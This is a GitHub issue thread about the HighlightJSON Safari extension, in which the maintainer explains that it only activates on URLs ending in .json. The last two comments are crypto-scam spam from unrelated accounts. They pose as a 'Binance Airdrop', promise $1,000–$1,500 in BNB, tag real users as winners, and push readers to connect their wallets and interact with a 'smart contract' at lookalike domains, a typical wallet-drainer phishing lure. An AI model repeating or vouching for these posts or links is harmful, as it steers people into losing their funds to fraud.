### ISSUE TITLE
Question is it working?

### ISSUE THREAD

**Issue by asyba** [lexrus/HighlightJSON#1]
What is suppose to do the app?
I have it on my iphone and viewing a json output url on safari and after click the extension it is only showing a popout black text with a url to highlight.js

**Comment by lexrus** [comment]
It's limit to `"matches": [ "*://*/*.json" ]`. Try open a json file end with ".json" extension.
https://github.com/lexrus/HighlightJSON/blob/main/HighlightJSON%20Extension/Resources/manifest.json#L19

Apparently it should look after the content type header of application/json for any text response. I'm looking for a proper and efficient way to do that.

**Comment by asyba** [comment]
> It's limit to `"matches": [ "*://*/*.json" ]`. Try open a json file end with ".json" extension. https://github.com/lexrus/HighlightJSON/blob/main/HighlightJSON%20Extension/Resources/manifest.json#L19
> 
> Apparently it should look after the content type header of application/json for any text response. I'm looking for a proper and efficient way to do that.

why no make it without restriciton ?any webstie that I want to format the json that can have or not content type or url with .json or not .json extension.

**Comment by asyba** [comment]
oh its on the library itself and not your app

**Comment by BhavyClover** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by mkproject-admin** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @pyraxo, @nicholasglazer, @solomonNSI, @Coordinate-Cat, @thapecroth, @han-see, @idokleinman
